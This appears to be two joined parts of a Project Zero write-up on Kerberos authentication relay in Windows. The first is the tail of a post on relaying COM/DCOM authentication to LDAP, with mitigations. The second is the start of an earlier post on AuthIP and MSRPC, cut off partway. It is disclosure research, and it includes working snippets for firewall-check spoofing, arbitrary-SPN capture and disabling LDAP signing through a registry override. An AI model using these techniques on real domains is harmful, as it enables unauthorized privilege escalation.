This code creates a basic .NET object and COM marshals it to a standard OBJREF. I've left out the code for the marshalling and parsing of the OBJREF, but much of that is already present in the linked issue 325. We then modify the list of string bindings to only include a TCP binding for 127.0.0.1, forcing the OXID resolver to use TCP. If you specify a computer's hostname then the OXID resolver will use ALPC instead. Note that the string bindings in the OBJREF are only for binding to the OXID resolver, not the COM server itself.

We can then convert the modified OBJREF into an objref moniker. This format is useful as it allows us to trivially unmarshal the object in another process by calling the Marshal::BindToMoniker API in .NET and passing the moniker string. For example to bind to the COM object in PowerShell you can run the following command:

[Runtime.InteropServices.Marshal]::BindToMoniker("objref:TUVP...:")

Immediately after binding to the moniker a firewall dialog is likely to appear as shown:

Firewall dialog for the COM server when a TCP binding is created

This is requesting the user to allow our COM server process access to listen on all network interfaces for incoming connections. This prompt only appears when the client tries to resolve the OXID as DCOM supports dynamic RPC endpoints. Initially when the COM server starts it only listens on ALPC, but the RPCSS service can ask the server to bind to additional endpoints.

This request is made through an internal RPC interface that every COM server implements for use by the RPCSS service. One of the functions on this interface is UseProtSeq, which requests that the COM server enables a TCP endpoint. When the COM server receives the UseProtSeq call it tries to bind a TCP server to all interfaces, which subsequently triggers the Windows Defender Firewall to prompt the user for access.

Enabling the firewall permission requires administrator privileges. However, as we only need to listen for connections via localhost we shouldn't need to modify the firewall so the dialog can be dismissed safely. However, going back to the COM client we'll see an error reported.

Exception calling "BindToMoniker" with "1" argument(s):

"The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)"

If we allow our COM server executable through the firewall, the client is able to connect over TCP successfully. Clearly the firewall is affecting the behavior of the COM client in some way even though it shouldn't. Tracing through the unmarshalling process in the COM client, the error is being returned from RPCSS when trying to resolve the OXID's binding information. This would imply that no connection attempt is made, and RPCSS is detecting that the COM server wouldn't be allowed through the firewall and refusing to return any binding information for TCP.

Further digging into RPCSS led me to the following function:

BOOL IsPortOpen(LPWSTR ImageFileName, int PortNumber) {

  INetFwMgr* mgr;

 

  CoCreateInstance(CLSID_FwMgr, NULL, CLSCTX_INPROC_SERVER, 

                   IID_PPV_ARGS(&mgr));

  VARIANT Allowed;

  VARIANT Restricted;

  mgr->IsPortAllowed(ImageFileName, NET_FW_IP_VERSION_ANY, 

             PortNumber, NULL, NET_FW_IP_PROTOCOL_TCP,

             &Allowed, &Restricted);

  if (VT_BOOL != Allowed.vt)

    return FALSE;

  return Allowed.boolVal == VARIANT_TRUE;

}

This function uses the HNetCfg.FwMgr COM object, and calls INetFwMgr::IsPortAllowed to determine if the process is allowed to listen on the specified TCP port. This function is called for every TCP binding when enumerating the COM server's bindings to return to the client. RPCSS passes the full path to the COM server's executable and the listening TCP port. If the function returns FALSE then RPCSS doesn't consider it valid and won't add it to the list of potential bindings.

If the OXID resolving process doesn't have any binding at the end of the lookup process it will return the RPC_S_SERVER_UNAVAILABLE error and the COM client will fail to bind to the server. How can we get around this limitation without needing administrator privileges to allow our server through the firewall? We can convert this C++ code into a small PowerShell function to test the behavior of the function to see what would grant access.

function Test-IsPortOpen {

    param(

        [string]$Name,

        [int]$Port

    )

    $mgr = New-Object -ComObject "HNetCfg.FwMgr"

    $allow = $null

    $mgr.IsPortAllowed($Name, 2, $Port, "", 6, [ref]$allow, $null)

    $allow

}

foreach($f in $(ls "$env:WINDIR\system32\*.exe")) {    

    if (Test-IsPortOpen $f.FullName 12345) {

        Write-Host $f.Fullname

    }

}

This script enumerates all executable files in system32 and checks if they'd be allowed to connect to TCP port 12345. Normally the TCP port would be selected automatically, however the COM server can use the RpcServerUseProtseqEp API to pre-register a known TCP port for RPC communication, so we'll just pick port 12345.

The only executable in system32 that returns true from Test-IsPortOpen is svchost.exe. That makes some sense, the default firewall rules usually permit a limited number of services to be accessible through the firewall, the majority of which are hosted in a shared service process.

This check doesn't guarantee a COM server will be allowed through the firewall, just that it's potentially accessible in order to return a TCP binding string. As the connection will be via localhost we don't need to be allowed through the firewall, only that IsPortOpen thinks we could be open. How can we spoof the image filename?

The obvious trick would be to create a svchost.exe process and inject our own code in there. However, that is harder to achieve through pure .NET code and also injecting into an svchost executable is a bit of a red flag if something is monitoring for malicious code which might make the exploit unreliable. Instead, perhaps we can influence the image filename used by RPCSS?

Digging into the COM runtime, when a COM server registers itself with RPCSS it passes its own image filename as part of the registration information. The runtime gets the image filename through a call to GetModuleFileName, which gets the value from the ImagePathName field in the process parameters block referenced by the PEB.

We can modify this string in our own process to be anything we like, then when COM is initialized, that will be sent to RPCSS which will use it for the firewall check. Once the check passes, RPCSS will return the TCP string bindings for our COM server when unmarshalling the OBJREF and the client will be able to connect. This can all be done with only minor in-process modifications from .NET and no external servers required.

Capturing Authentication

At this point a new RPC connection will be made to our process to communicate with the marshaled COM object. During that process the COM client must authenticate, so we can capture and relay that authentication to another service locally or remotely. What's the best way to capture that authentication traffic?

Before we do anything we need to select what authentication we want to receive, and this will be reflected in the OBJREF's security bindings. As we're doing everything using the existing COM runtime we can register what RPC authentication services to use when calling CoInitializeSecurity in the COM server through the asAuthSvc parameter.

var svcs = new SOLE_AUTHENTICATION_SERVICE[] {

    new SOLE_AUTHENTICATION_SERVICE() {

      dwAuthnSvc = RpcAuthenticationType.Kerberos,

      pPrincipalName = "HOST/DC.domain.com"

    }

};

var str = SetProcessModuleName("System");

try

{

   CoInitializeSecurity(IntPtr.Zero, svcs.Length, svcs,

        IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,

        ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero,

        EOLE_AUTHENTICATION_CAPABILITIES.EOAC_DYNAMIC_CLOAKING,

        IntPtr.Zero);

}

finally

{

    SetProcessModuleName(str);

}

In the above code, we register to only receive Kerberos authentication and we can also specify an arbitrary SPN as I described in the previous blog post. One thing to note is that the call to CoInitializeSecurity will establish the connection to RPCSS and pass the executable filename. Therefore we need to modify the filename before calling the API as we can't change it after the connection has been established.

For swag points I specify the filename System rather than build the full path to svchost.exe. This is the name assigned to the kernel which is also granted access through the firewall. We restore the original filename after the call to CoInitializeSecurity to reduce the risk of it breaking something unexpectedly.

That covers the selection of the authentication service to use, but doesn't help us actually capture that authentication. My first thought to capture the authentication was to find the socket handle for the TCP server, close it and create a new socket in its place. Then I could directly process the RPC protocol and parse out the authentication. This felt somewhat risky as the RPC runtime would still think it has a valid TCP server socket and might fail in unexpected ways. Also it felt like a lot of work, when I have a perfectly good RPC protocol parser built into Windows.

I then resigned myself to hooking the SSPI APIs, although ideally I'd prefer not to do so. However, once I started looking at the RPC runtime library there weren't any imports for the SSPI APIs to hook into and I really didn't want to patch the functions themselves. It turns out that the RPC runtime loads security packages dynamically, based on the authentication service requested and the configuration of the HKLM\SOFTWARE\Microsoft\Rpc\SecurityService registry key.

Screenshot of the Registry Editor showing HKLM\SOFTWARE\Microsoft\Rpc\SecurityService key

The key, shown in the above screenshot has a list of values. The value's name is the number assigned to the authentication service, for example 16 is RPC_C_AUTHN_GSS_KERBEROS. The value's data is then the name of the DLL to load which provides the API, for Kerberos this is sspicli.dll.

The RPC runtime then loads a table of security functions from the DLL by calling its exported InitSecurityInterface method. At least for sspicli the table is always the same and is a pre-initialized structure in the DLL's data section. This is perfect, we can just call InitSecurityInterface before the RPC runtime is initialized to get a pointer to the table then modify its function pointers to point to our own implementation of the API. As an added bonus the table is in a writable section of the DLL so we don't even need to modify the memory protection.

Of course implementing the hooks is non-trivial. This is made more complex because RPC uses the DCE style Kerberos authentication which requires two tokens from the client before the server considers the authentication complete. This requires maintaining more state to keep the RPC server and client implementations happy. I'll leave this as an exercise for the reader.

Choosing a Relay Target Service

The next step is to choose a suitable target service to relay the authentication to. For issue 325 I relayed the authentication to the same machine's DCOM activator RPC service and was able to achieve an arbitrary file write.

I thought that maybe I could do so again, so I modified my .NET RPC client to handle the relayed authentication and tried accessing local RPC services. No matter what RPC server or function I called, I always got an access denied error. Even if I wrote my own RPC server which didn't have any checks, it would fail.

Digging into the failure it turned out that at some point (I don't know specifically when), Microsoft added a mitigation into the RPC runtime to make it very difficult to relay authentication back to the same system.

void SSECURITY_CONTEXT::ValidateUpgradeCriteria() {

  if (this->AuthnLevel < RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) {

    if (IsLoopback())

      this->UnsafeLoopbackAuth = TRUE;

  }

}

The SSECURITY_CONTEXT::ValidateUpgradeCriteria method is called when receiving RPC authentication packets. If the authentication level for the RPC connection is less than RPC_C_AUTHN_LEVEL_PKT_INTEGRITY such as RPC_C_AUTHN_LEVEL_PKT_CONNECT and the authentication was from the same system then a flag is set to true in the security context. The IsLoopback function calls the QueryContextAttributes API for the undocumented SECPKG_ATTR_IS_LOOPBACK attribute value from the server security context. This attribute indicates if the authentication was from the local system.

When an RPC call is made the server will check if the flag is true, if it is then the call will be immediately rejected before any code is called in the server including the RPC interface's security callback. The only way to pass this check is either the authentication doesn't come from the local system or the authentication level is RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above which then requires the client to know the session key for signing or encryption. The RPC client will also check for local authentication and will increase the authentication level if necessary. This is an effective way of preventing the relay of local authentication to elevate privileges.

Instead as I was focussing on Kerberos, I came to the conclusion that relaying the authentication to an enterprise network service was more useful. As the default settings for a domain controller's LDAP service still do not enforce signing, it would seem a reasonable target. As we'll see, this provides a limitation of the source of the authentication, as it must not enable Integrity otherwise the LDAP server will enforce signing.

The problem with LDAP is I didn't have any code which implemented the protocol. I'm sure there is some .NET code to do it somewhere, but the fewer dependencies I have the better. As I mentioned in the previous blog post, Windows has a builtin LDAP library in wldap32.dll. Could I repurpose its API but convert it into using relayed authentication?

Unsurprisingly the library doesn't have a "Enable relayed authentication" mode, but after a few minutes in a disassembler, it was clear it was also delay-loading the SSPI interfaces through the InitSecurityInterface method. I could repurpose my code for capturing the authentication for relaying the authentication. There was initially a minor issue, accidentally or on purpose there was a stray call to QueryContextAttributes which was directly imported, so I needed to patch that through an Import Address Table (IAT) hook as distasteful as that was.

There was still a problem however. When the client connects it always tries to enable LDAP signing, as we are relaying authentication with no access to the session key this causes the connection to fail. Setting the option value LDAP_OPT_SIGN in the library to false didn't change this behavior. I needed to set the LdapClientIntegrity registry value to 0 in the LDAP service's key before initializing the library. Unfortunately that key is only modifiable by administrators. I could have modified the library itself, but as it was checking the key during DllMain it would be a complex dance to patch the DLL in the middle of loading.

Instead I decided to override the HKEY_LOCAL_MACHINE key. This is possible for the Win32 APIs by using the RegOverridePredefKey API. The purpose of the API is to allow installers to redirect administrator-only modifications to the registry into a writable location, however for our purposes we can also use it to redirect the reading of the LdapClientIntegrity registry value.

[DllImport("Advapi32.dll")]

static extern int RegOverridePredefKey(

    IntPtr hKey,

    IntPtr hNewHKey

);

[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]

static extern IntPtr LoadLibrary(string libname);

static readonly IntPtr HKEY_LOCAL_MACHINE = new IntPtr(-2147483646);

static void OverrideLocalMachine(RegistryKey key)

{

    int res = RegOverridePredefKey(HKEY_LOCAL_MACHINE,

        key?.Handle.DangerousGetHandle() ?? IntPtr.Zero);

    if (res != 0)

        throw new Win32Exception(res);

}

static void LoadLDAPLibrary()

{

    string dummy = @"SOFTWARE\DUMMY";

    string target = @"System\CurrentControlSet\Services\LDAP";

    using (var key = Registry.CurrentUser.CreateSubKey(dummy, true))

    {

        using (var okey = key.CreateSubKey(target, true))

        {

            okey.SetValue("LdapClientIntegrity", 0,

                          RegistryValueKind.DWord);

            OverrideLocalMachine(key);

            try

            {

                IntPtr lib = LoadLibrary("wldap32.dll");

                if (lib == IntPtr.Zero)

                    throw new Win32Exception();

            }

            finally

            {

                OverrideLocalMachine(null);

                Registry.CurrentUser.DeleteSubKeyTree(dummy);

            }

        }

    }

}

This code redirects the HKEY_LOCAL_MACHINE key and then loads the LDAP library. Once it's loaded we can then revert the override so that everything else works as expected. We can now repurpose the built-in LDAP library to relay Kerberos authentication to the domain controller. For the final step, we need a privileged COM service to unmarshal the OBJREF to start the process.

Choosing a COM Unmarshaller

The RemotePotato attack assumes that a more privileged user is authenticated on the same machine. However I wanted to see what I could do without that requirement. Realistically the only thing that can be done is to relay the computer's domain account to the LDAP server.

To get access to authentication for the computer account, we need to unmarshal the OBJREF inside a process running as either SYSTEM or NETWORK SERVICE. These local accounts are mapped to the computer account when authenticating to another machine on the network.

We do have one big limitation on the selection of a suitable COM server: it must make the RPC connection using the RPC_C_AUTHN_LEVEL_PKT_CONNECT authentication level. Anything above that will enable Integrity on the authentication which will prevent us relaying to LDAP. Fortunately RPC_C_AUTHN_LEVEL_PKT_CONNECT is the default setting for DCOM, but unfortunately all services which use the svchost process change that default to RPC_C_AUTHN_LEVEL_PKT which enables Integrity.

After a bit of hunting around with OleViewDotNet, I found a good candidate class, CRemoteAppLifetimeManager (CLSID: 0bae55fc-479f-45c2-972e-e951be72c0c1) which is hosted in its own executable, runs as NETWORK SERVICE, and doesn't change any default settings as shown below.

Screenshot of the OleViewDotNet showing the security flags of the CRemoteAppLifetimeManager COM server

The server doesn't change the default impersonation level from RPC_C_IMP_LEVEL_IDENTIFY, which means the negotiated token will only be at SecurityIdentification level. For LDAP, this doesn't matter as it only uses the token for access checking, not to open resources. However, this would prevent using the same authentication to access something like the SMB server. I'm confident that given enough effort, a COM server with both RPC_C_AUTHN_LEVEL_PKT_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE could be found, but it wasn't necessary for my exploit.

Wrapping Up

That's a somewhat complex exploit. However, it does allow for authentication relay, with arbitrary Kerberos tokens from a local user to LDAP on a default Windows 10 system. Hopefully it might provide some ideas of how to implement something similar without always needing to write your protocol servers and clients and just use what's already available.

This exploit is very similar to the existing RemotePotato exploit that Microsoft have already stated will not be fixed. This is because Microsoft considers authentication relay attacks to be an issue with the configuration of the Windows network, such as not enforcing signing on LDAP, rather than the particular technique used to generate the authentication relay. As I mentioned in the previous blog post, at most this would be assessed as a Moderate severity issue which does not reach the bar for fixing as part of regular updates (or potentially, not being fixed at all).

As for mitigating this issue without it being fixed by Microsoft, a system administrator should follow Microsoft's recommendations to enable signing and/or encryption on any sensitive service in the domain, especially LDAP. They can also enable Extended Protection for Authentication where the service is protected by TLS. They can also configure the default DCOM authentication level to be RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above. These changes would make the relay of Kerberos, or NTLM significantly less useful.

Using Kerberos for Authentication Relay Attacks

Posted by James Forshaw, Project Zero

This blog post is a summary of some research I've been doing into relaying Kerberos authentication in Windows domain environments. To keep this blog shorter I am going to assume you have a working knowledge of Windows network authentication, and specifically Kerberos and NTLM. For a quick primer on Kerberos see this page which is part of Microsoft's Kerberos extension documentation or you can always read RFC4120.

Background

Windows based enterprise networks rely on network authentication protocols, such as NT Lan Manager (NTLM) and Kerberos to implement single sign on. These protocols allow domain users to seamlessly connect to corporate resources without having to repeatedly enter their passwords. This works by the computer's Local Security Authority (LSA) process storing the user's credentials when the user first authenticates. The LSA can then reuse those credentials for network authentication without requiring user interaction.

However, the convenience of not prompting the user for their credentials when performing network authentication has a downside. To be most useful, common clients for network protocols such as HTTP or SMB must automatically perform the authentication without user interaction otherwise it defeats the purpose of avoiding asking the user for their credentials.

This automatic authentication can be a problem if an attacker can trick a user into connecting to a server they control. The attacker could induce the user's network client to start an authentication process and use that information to authenticate to an unrelated service allowing the attacker to access that service's resources as the user. When the authentication protocol is captured and forwarded to another system in this way it's referred to as an Authentication Relay attack.

Simple diagram of an authentication relay attack

Authentication relay attacks using the NTLM protocol were first published all the way back in 2001 by Josh Buchbinder (Sir Dystic) of the Cult of the Dead Cow. However, even in 2021 NTLM relay attacks still represent a threat in default configurations of Windows domain networks. The most recent major abuse of NTLM relay was through the Active Directory Certificate Services web enrollment service. This combined with the PetitPotam technique to induce a Domain Controller to perform NTLM authentication allows for a Windows domain to be compromised by an unauthenticated attacker.

Over the years Microsoft has made many efforts to mitigate authentication relay attacks. The best mitigations rely on the fact that the attacker does not have knowledge of the user's password or control over the authentication process. This includes signing and encryption (sealing) of network traffic using a session key which is protected by the user's password or channel binding as part of Extended Protection for Authentication (EPA) which prevents relay of authentication to a network protocol under TLS.

Another mitigation regularly proposed is to disable NTLM authentication either for particular services or network wide using Group Policy. While this has potential compatibility issues, restricting authentication to only Kerberos should be more secure. That got me thinking, is disabling NTLM sufficient to eliminate authentication relay attacks on Windows domains?

Why are there no Kerberos Relay Attacks?

The obvious question is, if NTLM is disabled could you relay Kerberos authentication instead? Searching for Kerberos Relay attacks doesn't yield much public research that I could find. There is the krbrelayx tool written by Dirk-jan which is similar in concept to the ntlmrelayx tool in impacket, a common tool for performing NTLM authentication relay attacks. However as the accompanying blog post makes clear this is a tool to abuse unconstrained delegation rather than relay the authentication.

I did find a recent presentation by Sagi Sheinfeld, Eyal Karni, Yaron Zinar from Crowdstrike at Defcon 29 (and also coming up at Blackhat EU 2021) which relayed Kerberos authentication. The presentation discussed MitM network traffic to specific servers, then relaying the Kerberos authentication. A MitM attack relies on being able to spoof an existing server through some mechanism, which is a well known risk.  The last line in the presentation is "Microsoft Recommendation: Avoid being MITM’d…" which seems a reasonable approach to take if possible.

However a MitM attack is slightly different to the common NTLM relay attack scenario where you can induce a domain joined system to authenticate to a server an attacker controls and then forward that authentication to an unrelated service. NTLM is easy to relay as it wasn't designed to distinguish authentication to a particular service from any other. The only unique aspect was the server (and later client) challenge but that value wasn't specific to the service and so authentication for say SMB could be forwarded to HTTP and the victim service couldn't tell the difference. Subsequently EPA has been retrofitted onto NTLM to make the authentication specific to a service, but due to backwards compatibility these mitigations aren't always used.

On the other hand Kerberos has always required the target of the authentication to be specified beforehand through a principal name, typically this is a Service Principal Name (SPN) although in certain circumstances it can be a User Principal Name (UPN). The SPN is usually represented as a string of the form CLASS/INSTANCE:PORT/NAME, where CLASS is the class of service, such as HTTP or CIFS, INSTANCE is typically the DNS name of the server hosting the service and PORT and NAME are optional.

The SPN is used by the Kerberos Ticket Granting Server (TGS) to select the shared encryption key for a Kerberos service ticket generated for the authentication. This ticket contains the details of the authenticating user based on the contents of the Ticket Granting Ticket (TGT) that was requested during the user's initial Kerberos authentication process. The client can then package the service's ticket into an Authentication Protocol Request (AP_REQ) authentication token to send to the server.

Without knowledge of the shared encryption key the Kerberos service ticket can't be decrypted by the service and the authentication fails. Therefore if Kerberos authentication is attempted to an SMB service with the SPN CIFS/fileserver.domain.com, then that ticket shouldn't be usable if the relay target is a HTTP service with the SPN HTTP/fileserver.domain.com, as the shared key should be different.

In practice that's rarely the case in Windows domain networks. The Domain Controller associates the SPN with a user account, most commonly the computer account of the domain joined server and the key is derived from the account's password. The CIFS/fileserver.domain.com and HTTP/fileserver.domain.com SPNs would likely be assigned to the FILESERVER$ computer account, therefore the shared encryption key will be the same for both SPNs and in theory the authentication could be relayed from one service to the other. The receiving service could query for the authenticated SPN string from the authentication APIs and then compare it to its expected value, but this check is typically optional.

The selection of the SPN to use for the Kerberos authentication is typically defined by the target server's host name. In a relay attack the attacker's server will not be the same as the target. For example, the SMB connection might be targeting the attacker's server, and will assign the SPN CIFS/evil.com. Assuming this SPN is even registered it would in all probability have a different shared encryption key to the CIFS/fileserver.domain.com SPN due to the different computer accounts. Therefore relaying the authentication to the target SMB service will fail as the ticket can't be decrypted.

The requirement that the SPN is associated with the target service's shared encryption key is why I assume few consider Kerberos relay attacks to be a major risk, if not impossible. There's an assumption that an attacker cannot induce a client into generating a service ticket for an SPN which differs from the host the client is connecting to.

However, there's nothing inherently stopping Kerberos authentication being relayed if the attacker can control the SPN. The only way to stop relayed Kerberos authentication is for the service to protect itself through the use of signing/sealing or channel binding which rely on the shared knowledge between the client and server, but crucially not the attacker relaying the authentication. However, even now these service protections aren't the default even on critical protocols such as LDAP.

As the only limit on basic Kerberos relay (in the absence of service protections) is the selection of the SPN, this research focuses on how common protocols select the SPN and whether it can be influenced by the attacker to achieve Kerberos authentication relay.

Kerberos Relay Requirements

It's easy to demonstrate in a controlled environment that Kerberos relay is possible. We can write a simple client which uses the Security Support Provider Interface (SSPI) APIs to communicate with the LSA and implement the network authentication. This client calls the InitializeSecurityContext API which will generate an AP_REQ authentication token containing a Kerberos Service Ticket for an arbitrary SPN. This AP_REQ can be forwarded to an intermediate server and then relayed to the service the SPN represents. You'll find this will work, again to reiterate, assuming that no service protections are in place.

However, there are some caveats in the way a client calls InitializeSecurityContext which will impact how useful the generated AP_REQ is even if the attacker can influence the SPN. If the client specifies any one of the following request flags, ISC_REQ_CONFIDENTIALITY, ISC_REQ_INTEGRITY, ISC_REQ_REPLAY_DETECT or ISC_REQ_SEQUENCE_DETECT then the generated AP_REQ will enable encryption and/or integrity checking. When the AP_REQ is received by the server using the AcceptSecurityContext API it will return a set of flags which indicate if the client enabled encryption or integrity checking. Some services use these returned flags to opportunistically enable service protections.

For example LDAP's default setting is to enable signing/encryption if the client supports it. Therefore you shouldn't be able to relay Kerberos authentication to LDAP if the client enabled any of these protections. However, other services such as HTTP don't typically support signing and sealing and so will happily accept authentication tokens which specify the request flags.

Another caveat is the client could specify channel binding information, typically derived from the certificate used by the TLS channel used in the communication. The channel binding information can be controlled by the attacker, but not set to arbitrary values without a bug in the TLS implementation or the code which determines the channel binding information itself.

While services have an option to only enable channel binding if it's supported by the client, all Windows Kerberos AP_REQ tokens indicate support through the KERB_AP_OPTIONS_CBT options flag in the authenticator. Sagi Sheinfeld et al did demonstrate (see slide 22 in their presentation) that if you can get the AP_REQ from a non-Windows source it will not set the options flag and so no channel binding is enforced, but that was apparently not something Microsoft will fix. It is also possible that a Windows client disables channel binding through a registry configuration option, although that seems to be unlikely in real world networks.

If the client specifies the ISC_REQ_MUTUAL_AUTH request flag when generating the initial AP_REQ it will enable mutual authentication between the client and server. The client expects to receive an Authentication Protocol Response (AP_REP) token from the server after sending the AP_REQ to prove it has possession of the shared encryption key. If the server doesn't return a valid AP_REP the client can assume it's a spoofed server and refuse to continue the communication.

From a relay perspective, mutual authentication doesn't really matter as the server is the target of the relay attack, not the client. The target server will assume the authentication has completed once it's accepted the AP_REQ, so that's all the attacker needs to forward. While the server will generate the AP_REP and return it to the attacker they can just drop it unless they need the relayed client to continue to participate in the communication for some reason.

One final consideration is that the SSPI APIs have two security packages which can be used to implement Kerberos authentication, Negotiate and Kerberos. The Negotiate protocol wraps the AP_REQ (and other authentication tokens) in the SPNEGO protocol whereas Kerberos sends the authentication tokens using a simple GSS-API wrapper (see RFC4121).

The first potential issue is Negotiate is by far the most likely package in use as it allows a network protocol the flexibility to use the most appropriate authentication protocol that the client and server both support. However, what happens if the client uses the raw Kerberos package but the server uses Negotiate?

This isn't a problem as the server implementation of Negotiate will pass the input token to the function NegpDetermineTokenPackage in lsasrv.dll during the first call to AcceptSecurityContext. This function detects if the client has passed a GSS-API Kerberos token (or NTLM) and enables a pass through mode where Negotiate gets out of the way. Therefore even if the client uses the Kerberos package you can still authenticate to the server and keep the client happy without having to extract the inner authentication token or wrap up response tokens.

One actual issue for relaying is the Negotiate protocol enables integrity protection (equivalent to passing ISC_REQ_INTEGRITY to the underlying package) so that it can generate a Message Integrity Code (MIC) for the authentication exchange to prevent tampering. Using the Kerberos package directly won't add integrity protection automatically. Therefore relaying Kerberos AP_REQs from Negotiate will likely hit issues related to automatic enabling of signing on the server. It is possible for a client to explicitly disable automatic integrity checking by passing the ISC_REQ_NO_INTEGRITY request attribute, but that's not a common case.

It's possible to disable Negotiate from the relay if the client passes an arbitrary authentication token to the first call of the InitializeSecurityContext API. On the first call the Negotiate implementation will call the NegpDetermineTokenPackage function to determine whether to enable authentication pass through. If the initial token is NTLM or looks like a Kerberos token then it'll pass through directly to the underlying security package and it won't set ISC_REQ_INTEGRITY, unless the client explicitly requested it. The byte sequence [0x00, 0x01, 0x40] is sufficient to get Negotiate to detect Kerberos, and the token is then discarded so it doesn't have to contain any further valid data.

Sniffing and Proxying Traffic

Before going into individual protocols that I've researched, it's worth discussing some more obvious ways of getting access to Kerberos authentication targeted at other services. First is sniffing network traffic sent from client to the server. For example, if the Kerberos AP_REQ is sent to a service over an unencrypted network protocol and the attacker can view that traffic the AP_REQ could be extracted and relayed. The selection of the SPN will be based on the expected traffic so the attacker doesn't need to do anything to influence it.

The Kerberos authentication protocol has protections against this attack vector. The Kerberos AP_REQ doesn't just contain the service ticket, it's also accompanied by an Authenticator which is encrypted using the ticket's session key. This key is accessible by both the legitimate client and the service. The authenticator contains a timestamp of when it was generated, and the service can check if this authenticator is within an allowable time range and whether it has seen the timestamp already. This allows the service to reject replayed authenticators by caching recently received values, and the allowable time window prevents the attacker waiting for any cache to expire before replaying.

What this means is that while an attacker could sniff the Kerberos authentication on the wire and relay it, if the service has already received the authenticator it would be rejected as being a replay. The only way to exploit it would be to somehow prevent the legitimate authentication request from reaching the service, or race the request so that the attacker's packet is processed first.

Note, RFC4120 mentions the possibility of embedding the client's network address in the authenticator so that the service could reject authentication coming from the wrong host. This isn't used by the Windows Kerberos implementation as far as I can tell. No doubt it would cause too many false positives for the replay protection in anything but the simplest enterprise networks.

Therefore the only reliable way to exploit this scenario would be to actively interpose on the network communications between the client and service. This is of course practical and has been demonstrated many times assuming the traffic isn't protected using something like TLS with server verification. Various attacks would be possible such as ARP or DNS spoofing attacks or HTTP proxy redirection to perform the interposition of the traffic.

However, active MitM of protocols is a known risk and therefore an enterprise might have technical defenses in place to mitigate the issue. Of course, if such enterprises have enabled all the recommended relay protections,it's a moot point. Regardless, we'll assume that MitM is impractical for existing services due to protections in place and consider how individual protocols handle SPN selection.

IPSec and AuthIP

My research into Kerberos authentication relay came about in part because I was looking into the implementation of IPSec on Windows as part of my firewall research. Specifically I was researching the AuthIP ISAKMP which allows for Windows authentication protocols to be used to establish IPsec Security Associations.

I noticed that the AuthIP protocol has a GSS-ID payload which can be sent from the server to the client. This payload contains the textual SPN to use for the Kerberos authentication during the AuthIP process. This SPN is passed verbatim to the SSPI InitializeSecurityContext call by the AuthIP client.

As no verification is done on the format of the SPN in the GSS-ID payload, it allows the attacker to fully control the values including the service class and instance name. Therefore if an attacker can induce a domain joined machine to connect to an attacker controlled service and negotiate AuthIP then a Kerberos AP_REQ for an arbitrary SPN can be captured for relay use. As this AP_REQ is never sent to the target of the SPN it will not be detected as a replay.

Inducing authentication isn't necessarily difficult. Any IP traffic which is covered by the domain configured security connection rules will attempt to perform AuthIP. For example it's possible that a UDP response for a DNS request from the domain controller might be sufficient. AuthIP supports two authenticated users, the machine and the calling user. By default it seems the machine authenticates first, so if you convinced a Domain Controller to authenticate you'd get the DC computer account which could be fairly exploitable.

For interest's sake, the SPN is also used to determine the computer account associated with the server. This computer account is then used with Service For User (S4U) to generate a local access token allowing the client to determine the identity of the server. However I don't think this is that useful as the fake server can't complete the authentication and the connection will be discarded.

The security connection rules use IP address ranges to determine what hosts need IPsec authentication. If these address ranges are too broad it's also possible that ISAKMP AuthIP traffic might leak to external networks. For example if the rules don't limit the network ranges to the enterprise's addresses, then even a connection out to a public service could be accompanied by the ISAKMP AuthIP packet. This can be then exploited by an attacker who is not co-located on the enterprise network just by getting a client to connect to their server, such as through a web URL.

Diagram of a relay using a fake AuthIP server

To summarize the attack process from the diagram:

  1. Induce a client computer to send some network traffic to EVILHOST. It doesn't really matter what the traffic is, only that the IP address, type and port must match an IP security connection rule to use AuthIP. EVILHOST does not need to be domain joined to perform the attack.
  2. The network traffic will get the Windows IPsec client to try and establish a security association with the target host.
  3. A fake AuthIP server on the target host receives the request to establish a security association and returns a GSS-ID payload. This payload contains the target SPN, for example CIFS/FILESERVER.
  4. The IPsec client uses the SPN to create an AP_REQ token and sends it to EVILHOST.
  5. EVILHOST relays the Kerberos AP_REQ to the target service on FILESERVER.

Relaying this AuthIP authentication isn't ideal from an attacker's perspective. As the authentication will be used to sign and seal the network traffic, the request context flags for the call to InitializeSecurityContext will require integrity and confidentiality protection. For network protocols such as LDAP which default to requiring signing and sealing if the client supports it, this would prevent the relay attack from working. However if the service ignores the protection and doesn't have any further checks in place this would be sufficient.

This issue was reported to MSRC and assigned case number 66900. However Microsoft have indicated that it will not be fixed with a security bulletin. I've described Microsoft's rationale for not fixing this issue later in the blog post. If you want to reproduce this issue there's details on Project Zero's issue tracker.

MSRPC

After discovering that AuthIP could allow for authentication relay the next protocol I looked at is MSRPC. The protocol supports NTLM, Kerberos or Negotiate authentication protocols over connected network transports such as named pipes or TCP. These authentication protocols need to be opted into by the server using the RpcServerRegisterAuthInfo API by specifying the authentication service constants of RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_KERBEROS or RPC_C_AUTHN_GSS_NEGOTIATE respectively. When registering the authentication information the server can optionally specify the SPN that needs to be used by the client.

However, this SPN isn't actually used by the RPC server itself. Instead it's registered with the runtime, and a client can query the server's SPN using the RpcMgmtInqServerPrincName management API. Once the SPN is queried the client can configure its authentication for the connection using the RpcBindingSetAuthInfo API. However, this isn't required; the client could just generate the SPN manually and set it. If the client doesn't call RpcBindingSetAuthInfo then it will not perform any authentication on the RPC connection.

Aside, curiously when a connection is made to the server it can query the client's authentication information using the RpcBindingInqAuthClient API. However, the SPN that this API returns is the one registered by RpcServerRegisterAuthInfo and NOT the one which was used by the client to authenticate. Also Microsoft does mention the call to RpcMgmtInqServerPrincName in the "Writing a secure RPC client or server" section on MSDN. However they frame it in the context of mutual authentication and not to protect against a relay attack.

